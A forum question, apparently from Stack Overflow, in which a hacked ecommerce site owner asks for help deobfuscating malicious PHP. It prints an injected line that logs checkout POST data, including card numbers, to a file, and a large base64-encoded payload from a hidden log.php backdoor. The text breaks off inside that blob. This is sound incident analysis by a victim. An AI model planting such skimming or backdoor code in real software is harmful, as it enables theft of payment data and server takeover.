Deobfuscating Malicious Code: What's the purpose of this code? - php
So this week our small business ecommerce site got hacked. We noticed that the files on the live server were out of sync with our svn repo. Two files having to do with verifying card numbers had this at the end:
#file_put_contents("/home/*****/public_html/errors/error_log.txt", "{$_SERVER["REMOTE_ADDR"]}, {$_SERVER["REQUEST_URI"]}:\n" . print_r($_POST, 1), FILE_APPEND);
It writes the current request to an error_log.txt file. This code runs when the user hits 'confirm purchase', so the request has the full payment info in it. Obviously, this is not good.
We reverted the files and started investigating. The file this line was in was a *.inc file, and not publicly visible. The attacker must have already had access to our file system to read our code, know that that particular file was called during checkout, and insert the line in the correct place.
Today I found another file tucked away in a rarely touched corner of the site. log.php seems to present an interface for remote code execution. It was heavily obfuscated. Here is my attempt at deobfuscating it. Scroll past the massive block of base64 encoded mystery code to see my comments.
<?php
$data=base64_decode(str_replace("\n", '', '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
